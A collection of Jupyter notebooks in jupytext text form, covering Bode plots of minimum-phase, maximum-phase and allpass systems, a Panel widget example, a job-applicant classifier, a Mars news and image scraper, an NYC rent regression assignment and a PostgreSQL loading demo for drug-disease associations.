# [<NAME>](https://orcid.org/0000-0001-7225-9992),
# Professorship Signal Theory and Digital Signal Processing,
# [Institute of Communications Engineering (INT)](https://www.int.uni-rostock.de/),
# Faculty of Computer Science and Electrical Engineering (IEF),
# [University of Rostock, Germany](https://www.uni-rostock.de/en/)
#
# # Tutorial Signals and Systems (Signal- und Systemtheorie)
#
# Summer Semester 2021 (Bachelor Course #24015)
#
# - lecture: https://github.com/spatialaudio/signals-and-systems-lecture
# - tutorial: https://github.com/spatialaudio/signals-and-systems-exercises
#
# WIP...
# The project is currently under heavy development while adding new material for the summer semester 2021
#
# Feel free to contact lecturer [<EMAIL>](https://orcid.org/0000-0002-3010-0294)
#
# ## Übung / Exercise 6
# +
import numpy as np
import matplotlib.pyplot as plt
import scipy.signal as signal
base = 10 # log frequency axis, either 10 for log10 or 2 for log2
w = np.logspace(-3, 3, num=2**10, base=10)
figw, figh = 8, 8*10/16
# +
# Max-Phase System
sz = 2
sp = -1/2
H0 = 2
sys = signal.lti(sz, sp, H0)
w, Hlevel_dB, Hphase_deg = sys.bode(w)
w, H = sys.freqresp(w)
Hman1 = ((8*w**2 - 8) + 1j*20*w) / (1+4*w**2)
Hman2 = 10*np.log10(((8*w**2 - 8)**2 + 400*w**2)/(1+4*w**2)**2)
Hman3 = np.arctan2(20, 8*w-8/w)
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(H))))
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(Hman1))))
print(np.allclose(Hlevel_dB, Hman2))
print(np.allclose(Hphase_deg, np.angle(H)*180/np.pi))
print(np.allclose(Hphase_deg, np.angle(Hman1)*180/np.pi))
print(np.allclose(Hphase_deg, Hman3*180/np.pi))
plt.figure(figsize=(figw, figh))
plt.subplot(2, 1, 1)
plt.semilogx(w, Hlevel_dB, 'C0', lw=3, base=base)
#plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'level in dB')
plt.title(r'Maximum Phase System $H(s)_\mathrm{max}=2\,\frac{s-2}{s+1/2}$')
plt.xlim(w[0], w[-1])
plt.grid(True, which='both')
plt.subplot(2, 1, 2)
plt.semilogx(w, Hphase_deg, 'C0', lw=3, base=base)
plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'phase in degree')
plt.grid(True, which='both')
plt.xlim(w[0], w[-1])
plt.yticks(np.arange(0, 180+30, 30))
plt.grid(True, which='both')
plt.savefig('MaxMinPhaseAllpass_numpy_E1E7E53CFF_maxphase.pdf')
# +
# Min-Phase System
sz = -2
sp = -1/2
H0 = 2
sys = signal.lti(sz, sp, H0)
w, Hlevel_dB, Hphase_deg = sys.bode(w)
w, H = sys.freqresp(w)
Hman1 = ((8*w**2 + 8) - 1j*12*w) / (1+4*w**2)
Hman2 = 10*np.log10(((8*w**2 + 8)**2 + 144*w**2)/(1+4*w**2)**2)
Hman3 = np.arctan2(-12, 8*w+8/w)
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(H))))
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(Hman1))))
print(np.allclose(Hlevel_dB, Hman2))
print(np.allclose(Hphase_deg, np.angle(H)*180/np.pi))
print(np.allclose(Hphase_deg, np.angle(Hman1)*180/np.pi))
print(np.allclose(Hphase_deg, Hman3*180/np.pi))
plt.figure(figsize=(figw, figh))
plt.subplot(2, 1, 1)
plt.semilogx(w, Hlevel_dB, 'C1', lw=3, base=base)
#plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'level in dB')
plt.title(r'Minimum Phase System $H(s)_\mathrm{min}=2\,\frac{s+2}{s+1/2}$')
plt.xlim(w[0], w[-1])
plt.grid(True, which='both')
plt.subplot(2, 1, 2)
plt.semilogx(w, Hphase_deg, 'C1', lw=3, base=base)
plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'phase in degree')
plt.grid(True, which='both')
plt.xlim(w[0], w[-1])
plt.yticks(np.arange(-45, 0+15, 15))
plt.grid(True, which='both')
plt.savefig('MaxMinPhaseAllpass_numpy_E1E7E53CFF_minphase.pdf')
# +
# Allpass System
sz = +2
sp = -2
H0 = 1
sys = signal.lti(sz, sp, H0)
w, Hlevel_dB, Hphase_deg = sys.bode(w)
w, H = sys.freqresp(w)
Hman1 = ((w**2-4) + 1j*4*w) / (w**2+4)
Hman2 = 10*np.log10(((w**2-4)**2+16*w**2)/(w**2+4)**2)
Hman3 = np.arctan2(4, w-4/w)
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(H))))
print(np.allclose(Hlevel_dB, 20*np.log10(np.abs(Hman1))))
print(np.allclose(Hlevel_dB, Hman2))
print(np.allclose(Hphase_deg, np.angle(H)*180/np.pi))
print(np.allclose(Hphase_deg, np.angle(Hman1)*180/np.pi))
print(np.allclose(Hphase_deg, Hman3*180/np.pi))
plt.figure(figsize=(figw, figh))
plt.subplot(2, 1, 1)
plt.semilogx(w, Hlevel_dB, 'C2', lw=3, base=base)
#plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'level in dB')
plt.title(r'Allpass System $H(s)_\mathrm{all}=\frac{s-2}{s+2}$')
plt.xlim(w[0], w[-1])
plt.ylim(-12, 12)
plt.grid(True, which='both')
plt.subplot(2, 1, 2)
plt.semilogx(w, Hphase_deg, 'C2', lw=3, base=base)
plt.xlabel(r'$\omega$ / (rad/s)')
plt.ylabel(r'phase in degree')
plt.grid(True, which='both')
plt.xlim(w[0], w[-1])
plt.yticks(np.arange(0, 180+30, 30))
plt.grid(True, which='both')
plt.savefig('MaxMinPhaseAllpass_numpy_E1E7E53CFF_allpass.pdf')
# -
# ## Copyright
#
# This tutorial is provided as Open Educational Resource (OER), to be found at
# https://github.com/spatialaudio/signals-and-systems-exercises
# accompanying the OER lecture
# https://github.com/spatialaudio/signals-and-systems-lecture.
# Both are licensed under a) the Creative Commons Attribution 4.0 International
# License for text and graphics and b) the MIT License for source code.
# Please attribute material from the tutorial as *<NAME>,
# Continuous- and Discrete-Time Signals and Systems - A Tutorial Featuring
# Computational Examples, University of Rostock* with
# ``main file, github URL, commit number and/or version tag, year``.
|
system_properties_ct/MaxMinPhaseAllpass_numpy_E1E7E53CFF.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# ---
# +
import param
import panel as pn
pn.extension(sizing_mode="stretch_width")
# -
# ## param.Action Example
#
# This example demonstrates how to use ``param.Action`` to trigger an update in a method that depends on that parameter. Actions can trigger any function, but if we simply want to trigger a method that depends on that action, then we can define a small ``lambda`` function that triggers the parameter explicitly.
# +
class ActionExample(param.Parameterized):
"""
Demonstrates how to use param.Action to trigger an update.
"""
action = param.Action(lambda x: x.param.trigger('action'), label='Click here!')
number = param.Integer(default=0)
@param.depends('action')
def get_number(self):
self.number += 1
return self.number
action_example = ActionExample()
component = pn.Column(
pn.Row(
pn.Column(pn.panel(action_example, show_name=False, margin=0, widgets={"action": {"button_type": "primary"}, "number": {"disabled": True}}),
'**Click the button** to trigger an update in the output.'),
pn.panel(action_example.get_number, width=300), max_width=600)
)
component
# -
# ## App
#
# Lets wrap it into nice template that can be served via `panel serve action_button.ipynb`
pn.template.FastListTemplate(
site="Panel", title="param.Action Example",
main=[
"This example demonstrates **how to use ``param.Action`` to trigger an update** in a method that depends on that parameter.\n\nActions can trigger any function, but if we simply want to trigger a method that depends on that action, then we can define a small ``lambda`` function that triggers the parameter explicitly.",
component,
]
).servable();
|
examples/gallery/param/action_button.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
# %matplotlib inline
from datetime import datetime
import pyspark
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('default') # haciendo los graficos un poco mas bonitos xD
plt.rcParams['figure.figsize'] = (15, 5)
# -
try:
type(sc)
except NameError:
sc = pyspark.SparkContext('local[*]')
spark = pyspark.sql.SparkSession(sc)
sqlContext = pyspark.SQLContext(sc)
postulantes = pd.read_csv('./fiuba_1_postulantes_educacion.csv')
postulantes = pd.merge(postulantes, pd.read_csv('./fiuba_2_postulantes_genero_y_edad.csv'), on="idpostulante")
postulantes.head()
postulantes.nombre.unique()
postulantes.estado.unique()
postulantes.dropna(inplace=True)
postulantes.count()
# +
def fecha_a_anio(fecha):
anio = fecha.split('-')[0]
return int(anio) if anio.isdigit() else 0
def anio_a_edad(anio):
return 2018 - anio
# -
postulantes['edad'] = postulantes['fechanacimiento'].apply(fecha_a_anio).apply(anio_a_edad)
postulantes.drop(columns=['fechanacimiento'], inplace=True)
postulantes['edad'].head()
postulantes = postulantes[(postulantes['edad'] >= 18) & (postulantes['edad'] < 65)]
avisos = pd.read_csv('./fiuba_6_avisos_detalle.csv')
print(avisos.columns)
avisos = avisos[['idaviso', 'nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre_area']]
avisos.dropna(inplace=True)
avisos.head(5)
avisos.count()
vistas = pd.read_csv('./fiuba_3_vistas.csv')
vistas['count'] = 1
vistas['idaviso'] = vistas['idAviso']
vistas.drop(columns=['idAviso'], inplace=True)
vistas.head()
vistas_por_aviso = vistas.groupby('idaviso')['count'].sum().reset_index()[['idaviso', 'count']]
vistas_por_aviso.head()
postulaciones = pd.read_csv('./fiuba_4_postulaciones.csv')
postulaciones['count'] = 1
postulaciones.head()
postulaciones_por_aviso = postulaciones.groupby('idaviso')['count'].sum().reset_index()[['idaviso', 'count']]
postulaciones_por_aviso.head()
avisos = avisos.merge(postulaciones_por_aviso, on='idaviso')
avisos.rename(columns={'count':'posts_count'}, inplace=True)
avisos.head()
avisos = avisos.merge(vistas_por_aviso, on='idaviso')
avisos.rename(columns={'count':'vistas_count'}, inplace=True)
avisos.head()
avisos.dropna(inplace=True)
posts_por_area = avisos.groupby('nombre_area')['posts_count'].sum().reset_index()
areas_a_borrar = list(posts_por_area[(posts_por_area['posts_count'] < 500)]['nombre_area'].unique())
areas_a_borrar
avisos['ctr'] = avisos['posts_count']/avisos['vistas_count']
avisos['ctr'] = avisos['ctr'].apply(lambda x: 1 if x > 1 else x)
avisos.head()
avisos.count()
postulaciones = postulaciones[['idaviso', 'idpostulante']]
avisos = avisos.merge(postulaciones, on="idaviso")
avisos.head()
avisos.count()
avisos = avisos.merge(postulantes, on='idpostulante')
avisos.head()
avisos.count()
avisos.drop(columns=['idpostulante'], inplace=True)
avisos.drop(columns=['ctr'], inplace=True)
avisos[['nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre', 'estado', 'sexo', 'nombre_area']] = avisos[['nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre', 'estado', 'sexo', 'nombre_area']].apply(lambda x: x.astype('category'))
avisos.drop(columns=['posts_count', 'vistas_count'], inplace=True)
avisos.head()
avisos.count()
avisos = avisos[~avisos['nombre_area'].isin(areas_a_borrar)]
avisos.count()
avisos.head()
avisos.dtypes
avisos2 = pd.read_csv('./fiuba_6_avisos_detalle.csv')
print(avisos.columns)
avisos2 = avisos2[['idaviso', 'nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre_area']]
avisos[['nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre_area']] = avisos[['nombre_zona', 'tipo_de_trabajo', 'nivel_laboral', 'nombre_area']].apply(lambda x: x.astype('category'))
avisos2.dropna(inplace=True)
vistas.rename(columns={'idAviso':'idaviso'}, inplace=True)
vistas = vistas[['idaviso', 'idpostulante']]
post = pd.DataFrame(postulaciones['idaviso'].unique(), columns=['idaviso'])
avisos2 = avisos2.merge(post, on='idaviso', how='left')
avisos2 = avisos2.merge(vistas, on="idaviso")
avisos2 = avisos2.merge(postulantes, on='idpostulante')
avisos2[['nombre', 'estado', 'sexo']] = avisos2[['nombre', 'estado', 'sexo']].apply(lambda x: x.astype('category'))
avisos2 = avisos2[~avisos2['nombre_area'].isin(areas_a_borrar)]
avisos2.head()
avisos2.count()
avisos2.drop(columns=['idpostulante'], inplace=True)
avisos2.head()
avisos['se_postula'] = 1
avisos2['se_postula'] = 0
avisos.head()
avisos2.head()
aviso= None
avisos = pd.concat([avisos, avisos2], ignore_index=True)
avisos = pd.get_dummies(avisos)
avisos.head()
avisos.drop(columns=['idaviso'], inplace=True)
edad_min = avisos['edad'].min()
edad_max = avisos['edad'].max()
avisos['edad'] = avisos['edad'].apply(lambda x: (x-edad_min)/float(edad_max-edad_min))
avisos.head()
import gc
del [[postulantes,postulaciones,avisos2,vistas,post,postulaciones_por_aviso, X, y]]
postulantes = None
postulaciones = None
avisos2 = None
vistas = None
post = None
postulaciones_por_aviso = None
X = None
y = None
gc.collect()
from scipy.sparse import csr_matrix
y = avisos.se_postula.values
X = csr_matrix(avisos.drop('se_postula', axis=1).as_matrix())
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y)
print("X_train size: {} | y_train size: {} | X_test size: {} | y_test size: {}".format(X_train.shape, y_train.shape, X_test.shape, y_test.shape))
# +
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.linear_model import Perceptron
import time
classifiers = ({'Baseline' : DummyClassifier(strategy='uniform'),
'Decision Tree' : DecisionTreeClassifier(max_depth=10),
'Naive Bayes' : MultinomialNB(),
'Multi Layer Perceptron' : MLPClassifier(hidden_layer_sizes=30, activation='logistic'),
'Perceptron' : Perceptron(penalty='l2')
})
results = {}
for (clf_label, clf) in classifiers.items():
t0 = time.time()
clf.fit(X_train, y_train)
t1 = time.time()
predicted = clf.predict(X_test)
print("Params", clf.get_params())
print("{} Classifier score on training set: {}".format(clf_label, clf.score(X_train, y_train)))
print("{} Classifier score on validation set: {}".format(clf_label, clf.score(X_test, y_test)))
print("{} Classifier correctly predicted: {}".format(clf_label, accuracy_score(y_test, predicted, normalize=True)))
print("{} F1-score for validation set: {}".format(clf_label, f1_score(y_test, predicted)))
print("{} Classifier time needed to train: {}".format(clf_label, t1-t0))
print()
# -
X_user_0 = X.getrow(0)
X_user_0.todense()
y_user_0 = y.tolist()[0]
y_user_0
clf.predict_proba(X_user_0)
|
ModelosPredictivos.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Dependencies and Setup
from bs4 import BeautifulSoup as bs
from splinter import Browser
import pandas as pd
import requests
import time
# # Mac Users
# Show path that we will be using
# https://splinter.readthedocs.io/en/latest/drivers/chrome.html
# !which chromedriver
# ## NASA Mars News
# Choose the executable path to driver
executable_path = {"executable_path": "/usr/local/bin/chromedriver"}
browser = Browser("chrome", **executable_path, headless=False)
# Visit Nasa news url through splinter module
url_news = "https://mars.nasa.gov/news/"
browser.visit(url_news)
# +
# HTML Object
html_news = browser.html
soup = bs(html_news, "html.parser")
# Scrape the latest News Title and Paragraph Text
news_title = soup.find("div", class_ = "content_title").text
news_paragraph = soup.find("div", class_ = "article_teaser_body").text
# Display scrapped news
print(news_title)
print("-----------------------------------------")
print(news_paragraph)
# -
# ________________________________________________________________________
# ## JPL Mars Space Images - Featured Image
# Visit JPL Featured Space Image url through splinter module
url_spaceimage = "https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars"
browser.visit(url_spaceimage)
# HTML Object
img_html = browser.html
img_soup = bs(img_html, "html.parser")
# +
# Find image url to the full size
featured_image = img_soup.find("article")["style"].replace('background-image: url(','').replace(');', '')[1:-1]
# Display url of the full image
featured_image_url = f"https://www.jpl.nasa.gov{featured_image}"
print("JPL Featured Space Image")
print("-----------------------------------------")
print(featured_image_url)
# -
# ________________________________________________________________________
#
#
# ## Mars Weather
# +
# Visit Mars Weather twitter through splinter
url_weather = "https://twitter.com/marswxreport?lang=en"
browser.visit(url_weather)
# HTML Object
weather_html = browser.html
weather_soup = bs(weather_html, "html.parser")
# -
# HTML Object
weather_html = browser.html
weather_soup = bs(weather_html, "html.parser")
# +
# Scrape the latest Mars weather tweet from the page
weather = weather_soup.find("p", class_="TweetTextSize TweetTextSize--normal js-tweet-text tweet-text")
# Remove the anchor from paragraph
weather.a.decompose()
weather = weather.text
# +
# Clean up the text
mars_weather = weather.replace(" \n", '')
# Display Mars Weather
print("Mars Weather")
print("-----------------------------------------")
print(mars_weather)
# -
# ________________________________________________________________________
# ## Mars Facts
# +
# Visit the Mars Facts webpage and use Pandas to scrape the table
url_facts = "https://space-facts.com/mars/"
# Use Pandas - read_html - to scrape tabular data from a page
mars_facts = pd.read_html(url_facts)
mars_facts
# +
mars_df = mars_facts[0]
# Create Data Frame
mars_df.columns = ["Description", "Value"]
# Set index to Description
mars_df.set_index("Description", inplace=True)
# Print Data Frame
mars_df
# +
# Save html code to folder Assets
html_table = mars_df.to_html()
# Strip unwanted newlines to clean up the table
html_table.replace("\n", '')
# Save html code
mars_df.to_html("mars_facts_data.html")
# -
# ________________________________________________________________________
# ## Mars Hemispheres
# Visit the USGS Astrogeology Science Center url through splinter
url_hemisphere = "https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars"
browser.visit(url_hemisphere)
# HTML Object
html_hemisphere = browser.html
soup = bs(html_hemisphere, "html.parser")
# +
# Scrape all items that contain mars hemispheres information
hemispheres = soup.find_all("div", class_="item")
# Create empty list
hemispheres_info = []
# Sign main url for loop
hemispheres_url = "https://astrogeology.usgs.gov"
# Loop through the list of all hemispheres information
for i in hemispheres:
title = i.find("h3").text
hemispheres_img = i.find("a", class_="itemLink product-item")["href"]
# Visit the link that contains the full image website
browser.visit(hemispheres_url + hemispheres_img)
# HTML Object
image_html = browser.html
web_info = bs(image_html, "html.parser")
# Create full image url
img_url = hemispheres_url + web_info.find("img", class_="wide-image")["src"]
hemispheres_info.append({"title" : title, "img_url" : img_url})
# Display titles and images ulr
#hemispheres_info
# Or Display titles and images ulr this way
print("")
print(title)
print(img_url)
print("-----------------------------------------")
# -
|
mission_to_mars.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/marilynle/DS-Unit-2-Linear-Models/blob/master/module2-regression-2/Marilyn_L_E_Assignment_Regression_Classification_2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="wneJzIVyYAgj" colab_type="text"
# Lambda School Data Science
#
# *Unit 2, Sprint 1, Module 2*
#
# ---
# + [markdown] colab_type="text" id="7IXUfiQ2UKj6"
# # Regression 2
#
# ## Assignment
#
# You'll continue to **predict how much it costs to rent an apartment in NYC,** using the dataset from renthop.com.
#
# - [ ] Do train/test split. Use data from April & May 2016 to train. Use data from June 2016 to test.
# - [ ] Engineer at least two new features. (See below for explanation & ideas.)
# - [ ] Fit a linear regression model with at least two features.
# - [ ] Get the model's coefficients and intercept.
# - [ ] Get regression metrics RMSE, MAE, and $R^2$, for both the train and test data.
# - [ ] What's the best test MAE you can get? Share your score and features used with your cohort on Slack!
# - [ ] As always, commit your notebook to your fork of the GitHub repo.
#
#
# #### [Feature Engineering](https://en.wikipedia.org/wiki/Feature_engineering)
#
# > "Some machine learning projects succeed and some fail. What makes the difference? Easily the most important factor is the features used." — <NAME>, ["A Few Useful Things to Know about Machine Learning"](https://homes.cs.washington.edu/~pedrod/papers/cacm12.pdf)
#
# > "Coming up with features is difficult, time-consuming, requires expert knowledge. 'Applied machine learning' is basically feature engineering." — <NAME>, [Machine Learning and AI via Brain simulations](https://forum.stanford.edu/events/2011/2011slides/plenary/2011plenaryNg.pdf)
#
# > Feature engineering is the process of using domain knowledge of the data to create features that make machine learning algorithms work.
#
# #### Feature Ideas
# - Does the apartment have a description?
# - How long is the description?
# - How many total perks does each apartment have?
# - Are cats _or_ dogs allowed?
# - Are cats _and_ dogs allowed?
# - Total number of rooms (beds + baths)
# - Ratio of beds to baths
# - What's the neighborhood, based on address or latitude & longitude?
#
# ## Stretch Goals
# - [ ] If you want more math, skim [_An Introduction to Statistical Learning_](http://faculty.marshall.usc.edu/gareth-james/ISL/ISLR%20Seventh%20Printing.pdf), Chapter 3.1, Simple Linear Regression, & Chapter 3.2, Multiple Linear Regression
# - [ ] If you want more introduction, watch [<NAME>, Statistics 101: Simple Linear Regression](https://www.youtube.com/watch?v=ZkjP5RJLQF4)
# (20 minutes, over 1 million views)
# - [ ] Add your own stretch goal(s) !
# + colab_type="code" id="o9eSnDYhUGD7" colab={}
# %%capture
import sys
# If you're on Colab:
if 'google.colab' in sys.modules:
DATA_PATH = 'https://raw.githubusercontent.com/LambdaSchool/DS-Unit-2-Applied-Modeling/master/data/'
# !pip install category_encoders==2.*
# If you're working locally:
else:
DATA_PATH = '../data/'
# Ignore this Numpy warning when using Plotly Express:
# FutureWarning: Method .ptp is deprecated and will be removed in a future version. Use numpy.ptp instead.
import warnings
warnings.filterwarnings(action='ignore', category=FutureWarning, module='numpy')
# + colab_type="code" id="cvrw-T3bZOuW" colab={}
import numpy as np
import pandas as pd
# Read New York City apartment rental listing data
df = pd.read_csv(DATA_PATH+'apartments/renthop-nyc.csv')
assert df.shape == (49352, 34)
# Remove the most extreme 1% prices,
# the most extreme .1% latitudes, &
# the most extreme .1% longitudes
df = df[(df['price'] >= np.percentile(df['price'], 0.5)) &
(df['price'] <= np.percentile(df['price'], 99.5)) &
(df['latitude'] >= np.percentile(df['latitude'], 0.05)) &
(df['latitude'] < np.percentile(df['latitude'], 99.95)) &
(df['longitude'] >= np.percentile(df['longitude'], 0.05)) &
(df['longitude'] <= np.percentile(df['longitude'], 99.95))]
# + id="avw7hptZ8k2E" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="ff8a039d-6ce3-4259-a4b6-d4ad7cd03eed"
# Exploring the data
df.head()
# + id="XMKH8vyo8k6P" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="b5141bb6-51eb-43ac-f940-0fa8c5b5ffde"
# Checking for null values
df.isnull().sum()
# + id="eaZN9_5k94vw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="1b9d1289-1d47-4ff1-c27f-174f912f737f"
# Dropping NaN and checking
df = df.dropna()
df.isnull().sum()
# + id="oEOtKK7lmA-W" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 612} outputId="3f7a9b31-2106-4d9e-ae08-78a148f5fcdf"
df.dtypes
# + id="8s7U5se9de1V" colab_type="code" colab={}
# Engineer at least two new features.
# + id="w_teQocZde5Y" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="eebc08f4-0239-4556-e903-3a5711a5b719"
# Are cats or dogs allowed?
# Creating feature cats_or_dogs
df['cats_or_dogs'] = (df.cats_allowed.eq(1)) | (df.dogs_allowed.eq(1))
df.head()
# + id="I08yt7NNde93" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="6aa37cc6-62f5-45ef-d406-163c934a1361"
# Are cats and dogs allowed?
# Creating feature cats_and_dogs
df['cats_and_dogs'] = (df['cats_allowed']== 1) & (df['dogs_allowed']== 1)
df.head()
# + id="_ChmpKpffeGm" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 581} outputId="adf8e1a9-a1be-466c-f62c-0f1efcf69151"
df['cats_or_dogs']= df['cats_or_dogs'].replace({False:int(0),True:int(1)})
df['cats_and_dogs'] = df['cats_and_dogs'].replace({False:int(0),True:int(1)})
df.sample(5)
# + id="Zmn-HUE_-boD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="2ffb1846-6326-46b6-a57e-cb26eda44f85"
# Do train/test split. Use data from April & May 2016 to train. Use data from June 2016 to test.
train = df[df['created'].str.contains('2016-04|2016-05')]
test = df[df['created'].str.contains('2016-06')]
train.head()
# + id="BBLB0Pl7zWdZ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 513} outputId="4e1dfc96-ea15-4c0c-9c02-24a5a9bdb0bf"
test.head()
# + id="E6NlAK7gzuCu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="8ebc66ec-9c0d-45eb-cc08-d2ccd18bf7f5"
train.shape, test.shape
# + id="68o_jBjo0AuL" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 170} outputId="2834c543-b622-4c09-d66a-777988c7b562"
# Fit a linear regression model with at least two features.
from sklearn.metrics import mean_absolute_error
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score
model = LinearRegression()
# Arrange y target vectors
target = 'price'
y_train = train[target]
y_test = test[target]
# Arrange X features matrices
features = ['bedrooms','cats_and_dogs']
X_train = train[features]
X_test = test[features]
print(f'Linear Regression, dependent on: {features}')
# Fit the model
model.fit(X_train, y_train)
y_pred = model.predict(X_train)
# Get regression metrics RMSE, MAE, and R2 # train data.
mse = mean_squared_error(y_train, y_pred)
rmse = np.sqrt(mse)
mae = mean_absolute_error(y_train, y_pred)
r2 = r2_score(y_train, y_pred)
print(f'Test Mean Squared Error: {mse:.2f}')
print(f'Test Root Mean Squared Error: {rmse:.2f}')
print(f'Test Mean Absolute Error: {mae:.2f}')
print(f'Test R^2 Error: {r2:.2f}')
# Apply the model to new data
y_pred = model.predict(X_test)
# Get regression metrics RMSE, MAE, and R2 # test data.
mse = mean_squared_error(y_test, y_pred)
rmse = np.sqrt(mse)
mae = mean_absolute_error(y_test, y_pred)
r2 = r2_score(y_test, y_pred)
print(f'Train Mean Squared Error: {mse:.2f}')
print(f'Train Root Mean Squared Error: {rmse:.2f}')
print(f'Train Mean Absolute Error: {mae:.2f}')
print(f'Train R^2 Error: {r2:.2f}')
# + id="L6-fRm2e-pi1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="8c13ef86-dfcd-4376-a42f-1968eb789f06"
# Get the model's coefficients and intercept.
print('Intercept', model.intercept_)
coefficients = pd.Series(model.coef_, features)
print(coefficients.to_string())
# + id="qp9Gtgs20sfN" colab_type="code" colab={}
# Stretch Goals
# scatterplot of the relationship between 2 features and the target.
import itertools
import numpy as np
import plotly.express as px
import plotly.graph_objs as go
def regression_3d(df, x, y, z, num=100, **kwargs):
"""
Visualize linear regression in 3D: 2 features + 1 target
df : Pandas DataFrame
x : string, feature 1 column in df
y : string, feature 2 column in df
z : string, target column in df
num : integer, number of quantiles for each feature
"""
# Plot data
fig = px.scatter_3d(df, x, y, z, **kwargs)
# Fit Linear Regression
features = [x, y]
target = z
model = LinearRegression()
model.fit(df[features], df[target])
# Define grid of coordinates in the feature space
xmin, xmax = df[x].min(), df[x].max()
ymin, ymax = df[y].min(), df[y].max()
xcoords = np.linspace(xmin, xmax, num)
ycoords = np.linspace(ymin, ymax, num)
coords = list(itertools.product(xcoords, ycoords))
# Make predictions for the grid
predictions = model.predict(coords)
Z = predictions.reshape(num, num).T
# Plot predictions as a 3D surface (plane)
fig.add_trace(go.Surface(x=xcoords, y=ycoords, z=Z))
return fig
# + id="kqq6iWG6RTmb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 617} outputId="8e422c32-986a-4b72-a0f2-26fec182a6fc"
regression_3d(
train,
x='bedrooms',
y='price',
z='cats_and_dogs',
title='Rent an apartment in NYC'
)
|
module2-regression-2/Marilyn_L_E_Assignment_Regression_Classification_2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Use a SQL database for clinical data 🧪
#
# Demo to quickly load 400k+ drug-disease associations in a PostgreSQL database on the DSRI with Python, and pandas.
import psycopg2
import pandas as pd
# ## Download the data
#
# From http://snap.stanford.edu/biodata/datasets/10004/10004-DCh-Miner.html using Pandas. We also add `DRUGBANK:` at the start of the Chemical ID to have valid CURIEs (namespace + identifier)
data = pd.read_csv('https://snap.stanford.edu/biodata/datasets/10004/files/DCh-Miner_miner-disease-chemical.tsv.gz', sep='\t', header=0)
data["Chemical"] = data["Chemical"].apply (lambda row: 'DRUGBANK:' + row)
print(data)
data.to_csv('mined-disease-chemical-associations.csv', index=False, header=False)
# ## Load the data in the database
#
# Connect to the PostgreSQL database, and create the table for drug-disease associations in the default database selected by postgres
#
# PostgreSQL client docs: https://www.psycopg.org/docs/usage.html
#
# You can try it locally with docker (you will need to use `host='localhost',`)
#
# ```
# docker run -it --rm -p 5432:5432 -e POSTGRES_USER=postgres -e POSTGRES_PASSWORD=<PASSWORD> -e POSTGRES_DB=sampledb postgres
# ```
conn = psycopg2.connect(
host='postgresql-demo',
# host='localhost',
# dbname='sampledb',
user='postgres',
password='<PASSWORD>')
cursor = conn.cursor()
cursor.execute("""CREATE TABLE associations(
disease_id VARCHAR(255),
drug_id VARCHAR(255),
PRIMARY KEY (disease_id, drug_id)
);""")
# Load the CSV file in the database `associations` table:
f = open(r'mined-disease-chemical-associations.csv', 'r')
cursor.copy_from(f, 'associations', sep=',')
f.close()
# +
## Example to load a single row:
# cursor.execute("""INSERT INTO associations(disease_id, drug_id)
# VALUES('MESH:D001523', 'DB00235')
# ;""")
# -
# ## Query the database
#
# You can now run a `SELECT` query:
# + tags=[]
print('Number of associations in the database:')
cursor.execute('SELECT COUNT(*) FROM associations;')
records = cursor.fetchall()
for i in records:
print(i)
